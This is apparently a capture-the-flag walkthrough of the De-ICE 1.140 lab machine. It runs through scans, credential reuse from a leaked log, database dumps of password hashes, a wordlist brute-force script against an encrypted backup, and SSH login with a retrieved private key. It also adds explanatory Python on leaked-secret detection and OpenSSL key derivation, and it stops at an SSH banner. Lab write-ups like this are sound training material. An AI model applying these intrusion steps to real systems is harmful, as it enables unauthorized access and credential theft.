Wednesday, 8 January 2014

De-ICE 1.140

root@kali:~# netdiscover

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:17:86:46    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.101  08:00:27:fe:04:1c    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.56.101
TCP open                 ftp[   21]        from 192.168.56.101  ttl 64
TCP open                 ssh[   22]        from 192.168.56.101  ttl 64
TCP open                http[   80]        from 192.168.56.101  ttl 64
TCP open               https[  443]        from 192.168.56.101  ttl 64
TCP open               imaps[  993]        from 192.168.56.101  ttl 64
TCP open               pop3s[  995]        from 192.168.56.101  ttl 64

root@kali:~# nmap -sS -sV -O 192.168.56.101 -pT:21,22,80,443,993,995

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-07 13:29 CET
Nmap scan report for 192.168.56.101
Host is up (0.00044s latency).
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      ProFTPD 1.3.4a
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
993/tcp open  ssl/imap Dovecot imapd
995/tcp open  ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:FE:04:1C (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2014-01-07 13:35:52 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2014-01-07 13:36:02 (GMT1) (10 seconds)
---------------------------------------------------------------------------

root@kali:~# nikto -ssl -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /CN=webhost
                   Ciphers: DHE-RSA-AES256-GCM-SHA384
                   Issuer:  /CN=webhost
+ Start Time:         2014-01-08 11:50:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ Cookie phpMyAdmin created without the httponly flag
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2014-01-08 11:52:53 (GMT1) (125 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.101

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 13:36:44 2014
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.56.101/forum/
+ http://192.168.56.101/index (CODE:200|SIZE:1782)
+ http://192.168.56.101/index.html (CODE:200|SIZE:1782)
+ http://192.168.56.101/server-status (CODE:403|SIZE:215)

---- Entering directory: http://192.168.56.101/forum/ ----
+ http://192.168.56.101/forum/LICENSE (CODE:200|SIZE:33093)
+ http://192.168.56.101/forum/README (CODE:200|SIZE:730)
==> DIRECTORY: http://192.168.56.101/forum/backup/
==> DIRECTORY: http://192.168.56.101/forum/config/
==> DIRECTORY: http://192.168.56.101/forum/images/
==> DIRECTORY: http://192.168.56.101/forum/includes/
+ http://192.168.56.101/forum/index (CODE:200|SIZE:7348)
+ http://192.168.56.101/forum/index.php (CODE:200|SIZE:7348)
==> DIRECTORY: http://192.168.56.101/forum/install/
==> DIRECTORY: http://192.168.56.101/forum/js/
==> DIRECTORY: http://192.168.56.101/forum/lang/
==> DIRECTORY: http://192.168.56.101/forum/modules/
==> DIRECTORY: http://192.168.56.101/forum/templates_c/
==> DIRECTORY: http://192.168.56.101/forum/themes/
==> DIRECTORY: http://192.168.56.101/forum/update/

---- Entering directory: http://192.168.56.101/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/install/ ----
+ http://192.168.56.101/forum/install/index (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/index.php (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/install (CODE:200|SIZE:12898)

---- Entering directory: http://192.168.56.101/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                              
-----------------
DOWNLOADED: 13776 - FOUND: 11

root@kali:/usr/share/dirb# dirb https://192.168.56.101 wordlists/small.txt

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 16:54:16 2014
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: wordlists/small.txt

-----------------

GENERATED WORDS: 957                                                          

---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: https://192.168.56.101/forum/
+ https://192.168.56.101/index (CODE:200|SIZE:1782)
==> DIRECTORY: https://192.168.56.101/phpmyadmin/
==> DIRECTORY: https://192.168.56.101/webmail/

---- Entering directory: https://192.168.56.101/forum/ ----
+ Dumping session state and Quitting.

-----------------
DOWNLOADED: 1063 - FOUND: 2

http://192.168.56.101/forum/
http://192.168.56.101/forum/config/

sqlmap -u "http://192.168.56.101/forum/index.php" --data="mode=login&username=admin%27&userpw=a"
...
[13:49:41] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=user

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user"
...
[13:53:05] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

admin     Admin           E-mail
MBrown     User           E-mail
RHedley     User           E-mail
SWillard     Moderator           E-mail

Sandy (sw@lazyadmins.corp)
Mark
Richy

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user&show_user=1"
...
[13:56:03] [ERROR] possible integer casting detected (e.g. "$show_user=intval($_REQUEST['show_user'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] y
[13:56:06] [INFO] skipping GET parameter 'show_user'
[13:56:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=contact&user_id=2

powered by my little forum

page source:
my little forum 2.3.1

forum:

Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
...
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2

by SWillard @, Monday, March 11, 2013, 09:43 (302 days ago)

Hi everybody

As you all know I I got married a few days before (yay :-D)
And because of this I have changed my email-account to match MY NEEEWWW NAME :-D

Bye
Sandy Willard formally known as Sandy Raines ;)
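Added example (mine, not from the post or the De-ICE image) for the sshd excerpt that was posted on the forum above: the rejected "user" is a password typed into the username field, and a log review should catch that before an excerpt is shared. The sample log is constructed from the quoted lines plus two ordinary entries; the account-name heuristic and the 60-second correlation window are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the sshd lines quoted on the forum above, plus two ordinary
# entries (a scanner probing "admin", and a normal key-based login elsewhere).
SAMPLE_LOG = """\
Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
Mar 7 11:15:30 testbox sshd[5768]: Invalid user admin from 10.10.2.131
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:20:01 testbox sshd[5790]: Accepted publickey for rhedley from 10.0.0.40 port 40122 ssh2
"""

TS = r"(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d{2}:\d{2}:\d{2})"
# Non-greedy user field so a secret containing spaces is still captured whole.
INVALID_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Invalid user (?P<user>.+?) from (?P<ip>\S+)$")
ACCEPTED_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port")

# What a legitimate local account name normally looks like (adduser's default rule).
POSIX_NAME = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def _timestamp(m) -> datetime:
    # syslog carries no year; a fixed one is enough to order lines within one file
    return datetime.strptime("%s %s %s 2013" % (m["mon"], m["day"], m["time"]),
                             "%b %d %H:%M:%S %Y")


def char_classes(s: str) -> int:
    """Count lower, upper, digit and punctuation classes present in s."""
    return sum(bool(re.search(p, s)) for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))


def looks_like_secret(name: str) -> bool:
    """A rejected 'user' that is not a valid account name and mixes three or more
    character classes is far more likely a password in the wrong field than a login."""
    return not POSIX_NAME.match(name) and char_classes(name) >= 3


def find_leaked_credentials(log_text: str, window: timedelta = timedelta(seconds=60)):
    """Flag 'Invalid user' entries that look like secrets and pair each with the next
    successful login from the same source address, which is the probable owner."""
    invalid, accepted = [], []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = INVALID_RE.match(line)
        if m:
            invalid.append((lineno, _timestamp(m), m["user"], m["ip"]))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            accepted.append((_timestamp(m), m["user"], m["ip"]))
    findings = []
    for lineno, ts, value, ip in invalid:
        if not looks_like_secret(value):
            continue
        owner = next((u for t, u, a in accepted
                      if a == ip and timedelta(0) <= t - ts <= window), None)
        findings.append({"line": lineno, "value": value, "source": ip, "likely_owner": owner})
    return findings


def redact(log_text: str, findings) -> str:
    """Scrub the leaked values before a log excerpt is pasted anywhere (the forum
    post above shipped the raw line, which is how the password became public)."""
    for f in findings:
        log_text = log_text.replace(f["value"], "[REDACTED]")
    return log_text


if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_LOG):
        print("line %d: secret-looking username from %s; rotate password of %s"
              % (f["line"], f["source"], f["likely_owner"]))
```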

https://192.168.56.101/forum/install/install

CREATE TABLE mlf2_userdata (user_id int(11) NOT NULL auto_increment, user_type tinyint(4) NOT NULL default '0', user_name varchar(255) NOT NULL default '', user_real_name varchar(255) NOT NULL default '', gender tinyint(4) NOT NULL default '0', birthday date NOT NULL default '0000-00-00', user_pw varchar(255) NOT NULL default '', user_email varchar(255) NOT NULL default '', email_contact tinyint(4) default '0', user_hp varchar(255) NOT NULL default '', user_location varchar(255) NOT NULL default '', signature varchar(255) NOT NULL default '', profile text NOT NULL, logins int(11) NOT NULL default '0', last_login timestamp NOT NULL default CURRENT_TIMESTAMP, last_logout timestamp NOT NULL default '0000-00-00 00:00:00', user_ip varchar(128) NOT NULL default '', registered timestamp NOT NULL default '0000-00-00 00:00:00', category_selection varchar(255) DEFAULT NULL, thread_order tinyint(4) NOT NULL default '0', user_view tinyint(4) NOT NULL default '0', sidebar tinyint(4) NOT NULL default '1', fold_threads tinyint(4) NOT NULL default '0', thread_display tinyint(4) NOT NULL default '0', new_posting_notification tinyint(4) default '0', new_user_notification tinyint(4) default '0', user_lock tinyint(4) default '0', auto_login_code varchar(50) NOT NULL default '', pwf_code varchar(50) NOT NULL, activate_code varchar(50) NOT NULL default '', language VARCHAR(255) NOT NULL DEFAULT '', time_zone VARCHAR(255) NOT NULL DEFAULT '', time_difference smallint(4) default '0', theme VARCHAR(255) NOT NULL DEFAULT '', entries_read TEXT NOT NULL, PRIMARY KEY (user_id)) CHAR SET=utf8 COLLATE=utf8_general_ci;
...

INSERT INTO mlf2_userdata VALUES (1, 2, 'admin', '', 0, '0000-00-00',
'c3ccb88dc0a985b9b5da20bb9333854194dfbc7767d91c6936', 'admin@example.com', 1, '', '', '', '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '', NOW(), NULL, 0, 0, 1, 0, 0, 0, 0, 0, '', '', '', '', '', 0, '', '');

http://192.168.56.101/forum/index.php?mode=login

user : mbrown
pass: !DFiuoTkbxtdk0!

http://192.168.56.101/forum/index.php?mode=user&action=edit_profile

E-mail:     mb@lazyadmin.corp

Log out

https://192.168.56.101/webmail/src/login.php

username mb@lazyadmin.corp
pass: !DFiuoTkbxtdk0!

https://192.168.56.101/webmail/src/read_body.php?mailbox=INBOX&passed_id=2&startMessage=1

From:       sw@lazyadmin.corp
Date:       Sun, March 10, 2013 9:23 am
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1


Regards,
Sandy

Subject:       Audit
From:       sw@lazyadmin.corp
Date:       Sat, March 16, 2013 8:19 pm
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi Mark,

last we have made a password audit for all of our systems and we have seen
that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use
different passwords for different services. :)

Thank you!
Sandy

https://192.168.56.101/phpmyadmin/

https://192.168.56.101/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1 Documentation

https://192.168.56.101/phpmyadmin/index.php?

user : root
pass: S4!y.dk)j/_d1pKtX1

Exporting rows from "mlf2_userdata" table

"1","2","admin",,"0","0000-00-00","fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261","webmaster@lazyadmin.corp","1",,,,,"10","2013-03-24 19:03:02","2013-03-24 19:08:31","192.168.8.1","2013-03-09 15:57:17",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"2","0","RHedley","Richard Hedley","1","0000-00-00","31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3","rh@lazyadmin.corp","1",,,,,"5","2013-03-24 19:09:38","2013-03-24 19:09:52","192.168.8.1","2013-03-09 16:22:22",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"3","0","MBrown","Mark Brown","1","0000-00-00","8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1","mb@lazyadmin.corp","1",,,,,"7","2014-01-07 17:02:50","2014-01-07 17:02:50","192.168.56.102","2013-03-09 16:23:28",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"15,4,2,1,3,5,9,10,11,12,13,14,7,6,8"
"4","1","SWillard","Sandy Willard","2","0000-00-00","c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef","sw@lazyadmin.corp","1",,,,,"8","2013-03-24 19:09:08","2013-03-24 19:09:27","192.168.8.1","2013-03-09 16:25:13",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"

Exporting rows from "admin" table
"postfix@lazyadmin.corp","d189d0c727a549f263b93176fc851cec","2013-03-0917:34:21","2013-03-24 19:01:06","1"

Exporting rows from "mailbox" table
"rh@lazyadmin.corp","20f1275ce5e67be2c06476333b68f585","Richard Hedley","rh@lazyadmin.corp/","0","rh","lazyadmin.corp","2013-03-09 18:55:10","2013-03-24 19:02:10","1"
"sw@lazyadmin.corp","07255e7701a86ad1672765d15082f1a3","Sandy
Willard
","sw@lazyadmin.corp/","0","sw","lazyadmin.corp","2013-03-09 18:56:35","2013-03-24 19:02:23","1"
"mb@lazyadmin.corp","d768176c4486ce77787c73883406fe97","Mark Brown","mb@lazyadmin.corp/","0","mb","lazyadmin.corp","2013-03-09 18:56:55","2013-03-24 19:01:37","1"
"mp@lazyadmin.corp","fa514a9f39391658b15d5db542029aa6","Miles
Parker
","mp@lazyadmin.corp/","0","mp","lazyadmin.corp","2013-03-09 21:14:40","2013-03-24 19:01:57","1"

Exporting rows from "user" table

https://crackstation.net/
20f1275ce5e67be2c06476333b68f585
07255e7701a86ad1672765d15082f1a3
d768176c4486ce77787c73883406fe97
fa514a9f39391658b15d5db542029aa6

20f1275ce5e67be2c06476333b68f585
    md5    tum-ti-tum
07255e7701a86ad1672765d15082f1a3
    md5    Austin-Willard
d768176c4486ce77787c73883406fe97    Unknown    Not Found
fa514a9f39391658b15d5db542029aa6    Unknown    Not Found

root@kali:/usr/share/dirb# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password: (tum-ti-tum)
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd ..
250 CWD command successful
ftp> pwd
257 "/" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete

ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 May 13  2013 incoming
226 Transfer complete
ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc

ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (63067.8 kB/s)

root@kali:~# hd backup_webhost_130111.tar.gz.enc | more

00000000  53 61 6c 74 65 64 5f 5f  6e 39 35 1e fa ac ea b9  |Salted__n95.....|
00000010  13 37 de 82 6f 35 c8 5c  ad 90 eb 83 12 eb 05 af  |.7..o5.\........|
00000020  4f 7c b2 0d 51 ad f6 41  cd 7f 80 81 78 cf d7 7a  |O|..Q..A....x..z|

This is an OpenSSL salted encrypted file (the Salted__ magic followed by the 8-byte salt).

I made an encrypt.sh:

#!/bin/bash
# Try every wordlist entry as the passphrase. openssl exits non-zero on "bad decrypt"
# (its padding check), so the loop stops at the first entry that decrypts "cleanly".
while IFS= read -r LINE; do
  echo "$LINE"
  if openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass "pass:$LINE"; then
    break
  fi
done < /usr/share/wordlists/metasploit-jtr/password.lst

./encrypt.sh
...
abscond
bad decrypt
3074345112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:
absconder

The password is absconder?

root@kali:~# openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:absconder -p
salt=6E39351EFAACEAB9
key=61F734DD3D559913060B3A5F164B853A4D3777688F334E46
iv =677740BB2E10FD0A

root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: data

Something is wrong...
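Added example, not part of the original post, for the decrypt attempts above: it reproduces how `openssl enc` turns the passphrase and the Salted__ header into key and IV, and shows why a decrypt that does not fail with "bad decrypt" is still not proof the passphrase is right. It assumes the 1.0.x-era defaults (MD5-based EVP_BytesToKey, one round) that Kali's openssl used at the time; the 48 header bytes are copied from the hexdump above, and the cipher sizes are those of des3 and aes-256-cbc.

```python
import hashlib

# Magic that `openssl enc -salt` writes before the 8-byte salt (see the hexdump above).
OPENSSL_MAGIC = b"Salted__"

# Key and IV sizes, in bytes, of the two ciphers this walkthrough runs into:
# "-des3" (DES-EDE3-CBC) and the "aes-256-cbc" that /opt/backup.sh turns out to use.
CIPHER_SIZES = {"des3": (24, 8), "aes-256-cbc": (32, 16)}

# First 48 bytes of backup_webhost_130111.tar.gz.enc, copied from the hexdump above.
FILE_HEAD = bytes.fromhex(
    "53616c7465645f5f6e39351efaaceab9"
    "1337de826f35c85cad90eb8312eb05af"
    "4f7cb20d51adf641cd7f808178cfd77a"
)


def parse_salted_header(blob: bytes):
    """Split an OpenSSL 'Salted__' file into (salt, ciphertext)."""
    if len(blob) < 16 or blob[:8] != OPENSSL_MAGIC:
        raise ValueError("not an OpenSSL Salted__ file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     md=hashlib.md5, count: int = 1):
    """Legacy EVP_BytesToKey as `openssl enc` 1.0.x used it (MD5, one round):
    D_1 = H(pw || salt), D_i = H(D_{i-1} || pw || salt); key || iv = D_1 || D_2 || ...
    """
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        block = md(prev + password + salt).digest()
        for _ in range(count - 1):       # extra rounds only when count > 1
            block = md(block).digest()
        derived += block
        prev = block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def derive_for_cipher(cipher: str, password: bytes, blob: bytes):
    """Return (salt, key, iv) as `openssl enc -d -<cipher> -p` prints them."""
    key_len, iv_len = CIPHER_SIZES[cipher]
    salt, _ = parse_salted_header(blob)
    key, iv = evp_bytes_to_key(password, salt, key_len, iv_len)
    return salt, key, iv


def pkcs7_padding_ok(plaintext: bytes, block_size: int) -> bool:
    """The only check `openssl enc` performs; a failure here is the 'bad decrypt' error."""
    if not plaintext or len(plaintext) % block_size:
        return False
    n = plaintext[-1]
    return 1 <= n <= block_size and plaintext.endswith(bytes([n]) * n)


def looks_like_gzip(plaintext: bytes) -> bool:
    """What `file` looks for: the gzip magic 1f 8b at offset 0."""
    return plaintext[:2] == b"\x1f\x8b"


def padding_false_positive_rate(block_size: int) -> float:
    """Chance that a wrong key (or wrong cipher) still yields valid PKCS#7 padding
    on effectively random output: sum over pad lengths n of 256**-n, about 1/255."""
    return sum(256.0 ** -n for n in range(1, block_size + 1))


def candidate_accepted(plaintext: bytes, block_size: int) -> bool:
    """Accept a passphrase only when padding AND the expected gzip magic both check out;
    padding alone lets roughly one wordlist entry in 255 through, which is what happened
    with "absconder" against a file that was never DES3-encrypted."""
    return pkcs7_padding_ok(plaintext, block_size) and looks_like_gzip(plaintext)


if __name__ == "__main__":
    salt, key, iv = derive_for_cipher("des3", b"absconder", FILE_HEAD)
    print("salt=%s\nkey=%s\niv =%s" % (salt.hex().upper(), key.hex().upper(), iv.hex().upper()))
    print("padding-only false positive rate per guess: %.5f" % padding_false_positive_rate(8))
```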

root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.102:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 mbrown   mbrown       1675 Mar 10  2013 downloadkey
-rw-------   1 mbrown   mbrown       1675 Mar 10  2013 id_rsa
-rw-r--r--   1 mbrown   mbrown        396 Mar 10  2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (5002.3 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (396 bytes)
226 Transfer complete
396 bytes received in 0.00 secs (4345.2 kB/s)
ftp>

root@kali:~# more downloadkey
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
